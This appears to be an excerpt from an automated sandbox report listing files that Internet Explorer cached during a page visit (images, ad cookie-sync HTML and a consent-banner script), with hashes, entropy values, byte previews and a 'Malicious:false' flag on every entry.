                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:IcNUwfHORaOwUjJDXoEyvXpAgg1tZMfXXc2UpF44fAzkJC2w0sRl9UQuU/:I6HGaOwlE6XV6tZMfc2aAn59LT
                                                                                                                                                                                                                              MD5:33933640C045C8E307527A705B5D2F29
                                                                                                                                                                                                                              SHA1:9AF39C6CEE50571E737CA3667727C77D98846E8E
                                                                                                                                                                                                                              SHA-256:38DBAA7E434412E3AFEEFBC05B70CFE6F873D568DCA59BAF8714B0D0FADC0A06
                                                                                                                                                                                                                              SHA-512:8351DAE3BD697AEDDEC0E52858CCDE313B9013530BA80B4AB23D6CCD8B4F766685101F6956189EC5281A6116AF40D9B5B6C0CD2AB00223C4D36D950E52EBF301
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...[..3.l..?....f...........a...M.bT9.D.Jb..P...&..p..v%...@...*nU.3zQp.d.N.9A.B0..1v.`..@....OZ@J.h.H.).DX.M...CC#.j@P.94$2D.*.,...U.]H..M.......5!......1@..p)..q@..q..Q........&.4..ER.P>Z.....R.I....E ....@.....h.#.MK.5S..$;.b..'SR.L.eM.p.E...SAq.R.\6R.\UN1.v...qN.q.)X.J...&+..b...;..I..@.v..\]..V...dT.w.....c.1..V...N..qL..>sR....h.\P....b....I@y.C.....zt.@<..Cb..9..qL.c.T.d.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAQXfYg[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11342
                                                                                                                                                                                                                              Entropy (8bit):7.947897306615944
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Qo52krOOO0Nhg2+Sxc8St1KfbfmCqosWjhwAb1HpdEiLfmR1PjL7OZQrpRkcd2Vw:b52kq4USxc8St1KfbqWjhwAb3aiL+fjP
                                                                                                                                                                                                                              MD5:9BF20F4698EE1CEBCFD7356D5A855FE3
                                                                                                                                                                                                                              SHA1:DE5F6CBA1DF6DED80862378E28DEABC14169ED71
                                                                                                                                                                                                                              SHA-256:25E964A3DE3B20F4BADC0E0987EB6311508270BB66A33AF9CBD6397B4146D23D
                                                                                                                                                                                                                              SHA-512:E0CF4117DCB1AC66791CB4858833FF3FC156DC4BF4F19ACF1DFDB08A89D5AB87BBC9DAF4E4B8F563CCEF41F9056DA4BD355A0875AB49BCDFB020599D3EC49A0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....TM..h.......@.....i3..Mj.|.Rf.$..I.>qY.....K..Z.S&)..H.>H...tAh7a.]..8..tz>...T*$....3X...u....Ecw`..gR..3.i..qJ...NR6...1.:.z......N..0@.u#!.EB...O.r:..E.K7..9.PH.z...h.[.\F.!GL..c...W8..,..}.........Q.R..M.v)L3...t.<..#...I.H..Z....-sdF.~X..V..K"m%..h.'.9..eGk.?..Q+..mk..:..qh.E...Q....d.EI......(G)..9ToA.Hl..'S..@V...H....H%...j.U....*9u..U...]f.#....S(......}....s.q
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAQXfgx[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25676
                                                                                                                                                                                                                              Entropy (8bit):7.959854408609341
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NQb01Ys+VK07GvLWvCcXQg2NhUGlnManN1ekVWOnI/:NL1Ys+Q07Gviv7Xqv97eKWOI/
                                                                                                                                                                                                                              MD5:0EDE139669D625C1BBA5E1ADEF41DA11
                                                                                                                                                                                                                              SHA1:21CD4D848F8E376047E7D2383CC21FF848DD0F7A
                                                                                                                                                                                                                              SHA-256:6CB1AFFD42AB2196C8DC2411F3BFE5C2D3B26BC2C3BDCA5B8E224E5659B9DBCC
                                                                                                                                                                                                                              SHA-512:FC00DD6E41EB758BB483EB31545A322F33DD76EDFA24BDC15FB12248CD568825E1B794F3C3AC76503551E6D6D88C9852CF8365CAE5795C9FAA1CFA28DFC315DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......h.......P.@.....H...b..S.m...@...\P..@......P..P(...........!.h.B..q@.(..P!B..p..(.....h...J..(.qH.\U.1L...1@.(........b..P...1HA..1Lb.@.b....]..P.......]...h..h..i.P)...B.@.......pZW.v.p......W.B......h...W.........&(........b...... .1...1H...m.B.....!.h.v.1.h.v...L....P..HB.@........h...W..i\..E.\R......)\....\R......\.-.................b....1@..........h..H...C....i.v.`...(Zc
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAQXkUK[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8696
                                                                                                                                                                                                                              Entropy (8bit):7.913734514082386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QoifkOmGLnwIJu2Tjve86rNpvz9JpPscwfCSE/0L:bikfGLnwInTjz6hpvz9Jpbsg/0L
                                                                                                                                                                                                                              MD5:B046E0D27EB64211DE94642363502123
                                                                                                                                                                                                                              SHA1:B9FB4A5A5E05468E65E30F9455C26AB5B793BF73
                                                                                                                                                                                                                              SHA-256:1BEAE0DD824FED1E301393FFF3B54E5F0DDCF2DEB80A816E3D8E876DC0501D11
                                                                                                                                                                                                                              SHA-512:E3B0FF068E7C903C4D06FDDE07288F4121ACF1A24E59067AB65FCB1C94DF66FE6E5246BDB3098E4EA80B380CFB5ABF38AA6AAF6A0175C94FC3421CA30E4CBBD8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..|.+.N].S..p...$.r9'...GSU.+...7....B..........5I\...L..G-.4+.i....a...>..=x.....1.4.*\I......#.I.W..4.%...&A...'.=.p..NC/.fnP....*.S..&.E.!,...Q...a0`....._..H..{...k..l.....\..&.a(>c...k`Hu.P3....q...N.f..Et..i~............o...z".I...cJ...65..H...UQ.n+J7..L{k.D..S.Ri.f...B../.`7.:P.0M.sM\C._.*...l1.6.....Tg...$ .......t..`p)$.J..T.....P....#....#-..i.3Z.!...i.RHdR....
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAQXnHc[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24246
                                                                                                                                                                                                                              Entropy (8bit):7.846747278977987
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:IbFTdh/uolTu7s3v8qXD/mo101CbF4tGEwS2K7qk6vp7WlDBKCiH5ac1hJ+Xu:IbFhh/uolUs3v8qT+vY4tjgnNx7xJ5ag
                                                                                                                                                                                                                              MD5:E45289AF4E26EA5530602CCD3B136153
                                                                                                                                                                                                                              SHA1:982BA72AC20A1A4F5EC26DCB92CA4FF954F2B588
                                                                                                                                                                                                                              SHA-256:A0BF83A579CCC7E3BD07DE74FCAFBC84AC6CF0C36B4DDE5B3589F899464A56C0
                                                                                                                                                                                                                              SHA-512:6193EC145EA9A057C9D399127B780483667FEA59CA0C0C611B3DC4BF1D99595FF4BE472306289364C086A3EAE16D01D7429712B548318E6252F1C703A04964BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..2 =r+..Y..N..3h...Z....!A....3..5.P.Lh...m.....W.8`jX.cq,...w..9...#.`.......`E.4lO,(..t..)G.i.a.HdOB.sZ..q.J.&l.A.Z.6X.Pm.5B3..;......R=.$Z7t^5.F..k...bvZ..}Dk.H.....fQ..,`....C....S.].3b.D0..b$...P0........X.....*E)..t....i.=J..@.'..`....$.# ...ZC.c.*.HC...y_4n.....<.E...+...|..#. ...P..wE..).a..].be....k..Y.CA..N1@....f...9....P......h..h..?.0..d...PWw.(%..<zU"J...
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAzb5EX[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):322
                                                                                                                                                                                                                              Entropy (8bit):6.966129933463651
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
                                                                                                                                                                                                                              MD5:89E1141C659F2127DD80809F71326697
                                                                                                                                                                                                                              SHA1:3262110C91000071FDBB0D33893EC1EC8026ADEC
                                                                                                                                                                                                                              SHA-256:98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
                                                                                                                                                                                                                              SHA-512:1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx..=..@..C.....K..`-(.`...vb......vV...`g.!D.....!.....7..../Qg.Z...Y........c....t.......c..)..............)@.:.....8..t1{P_\.1..3Ao......A].....5G_.....\5..x5R.....'...VS......|.`...~........+....H^..1E^...0.,')....qJ8!..D.!O}.i1..E(....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB7hjL[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):462
                                                                                                                                                                                                                              Entropy (8bit):7.383043820684393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
                                                                                                                                                                                                                              MD5:F810C713C84F79DBB3D6E12EDBCD1A32
                                                                                                                                                                                                                              SHA1:09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
                                                                                                                                                                                                                              SHA-256:6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
                                                                                                                                                                                                                              SHA-512:236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx...N.P...C.l...)...Mcb*qaC/..]..7..l...x.Z......w......._....<....|.........."FX.3.v.A.............1..Rt...}......;....BT.....(X.....(....4...-...f....0.8...|A.:P%.P..if.t..P..T.6..)s..H..~.C..(.7.s>....~...h..bz...Z.....D4Vm.T...2.5.U.P....q.6..1t~.ZU....7.i...".b.i.~...G.A!..&..+S.(<(...y._w..q........Q.l..1...Tz...Q...r.............g...+.o.]...J...$.8:.F..I.......XT..k.v....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBkwUr[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):436
                                                                                                                                                                                                                              Entropy (8bit):7.255906495097201
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                                                                                                                                                                                                              MD5:01B5E74F991A886215461BF0057008C7
                                                                                                                                                                                                                              SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                                                                                                                                                                                                              SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                                                                                                                                                                                                              SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+.....fIDATx.}..M.@.......0...Aa.......#0..."..0....a....<....<....y..qS......m..k..%.'|.......`....Z.`x...X............Np..x........a%(..ab........=.....j.[....0}.>.O..R~..<@y....nV..:.q.....G.P.e..............?s....i^l.P..5.0....?...&.A.K..|+...X.h)....5K...Zx...[....G...0N<.~PC.@.X.O2..N..x...:?..7.xH.&.......C3..8....Q.*.>...W..~..].U..U>L/....Le&.......IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\a5ea21[1].ico
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):758
                                                                                                                                                                                                                              Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                              MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                              SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                              SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                              SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\cfdbd9[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):740
                                                                                                                                                                                                                              Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                              MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                              SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                              SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                              SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[3].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21717
                                                                                                                                                                                                                              Entropy (8bit):5.305602492520896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
                                                                                                                                                                                                                              MD5:677C48207F5A13E6D6DADF30D2D6C52B
                                                                                                                                                                                                                              SHA1:10BCE9871F228CA247E92B0A6366D5FE2A4426C8
                                                                                                                                                                                                                              SHA-256:16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
                                                                                                                                                                                                                              SHA-512:7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[4].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21717
                                                                                                                                                                                                                              Entropy (8bit):5.305602492520896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
                                                                                                                                                                                                                              MD5:677C48207F5A13E6D6DADF30D2D6C52B
                                                                                                                                                                                                                              SHA1:10BCE9871F228CA247E92B0A6366D5FE2A4426C8
                                                                                                                                                                                                                              SHA-256:16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
                                                                                                                                                                                                                              SHA-512:7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\otSDKStub[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19145
                                                                                                                                                                                                                              Entropy (8bit):5.333194115540307
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:7RoViYMusfTaiBMFHRy0I2VMwG4JRuIKBf:7aViMsffBMnktf
                                                                                                                                                                                                                              MD5:0D2A3807FB77D862C97924D018C7B04C
                                                                                                                                                                                                                              SHA1:9D17F3621001D08F7B98395AC571FC5F6CDA7FEF
                                                                                                                                                                                                                              SHA-256:75DE71E7FEAC92082AF2F49B7079C0B587B16A5E2BB4DABDA7E7EB66327402FB
                                                                                                                                                                                                                              SHA-512:409ABCD5E970CAFF9F489D3E7F3D9464B2C5189118D2D046CA99E42CEC630C2C65B30397B8A87C3860E3426CF9F7E0A5F86511539CA9D9AEDA26C74CA9055922
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,A,b,y,v,C,I,w,S,L,T,R,B,D,P,_,E,G,U,O,k,F,V,N,x,j,H,M,K,z,q,W,J,Y,Q,X,Z,$,ee=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AAKp8YX[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):497
                                                                                                                                                                                                                              Entropy (8bit):7.3622228747283405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                                                                                                                                                                                                              MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                                                                                                                                                                                                              SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                                                                                                                                                                                                              SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                                                                                                                                                                                                              SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                                                                                                                                                                                                              Malicious:false
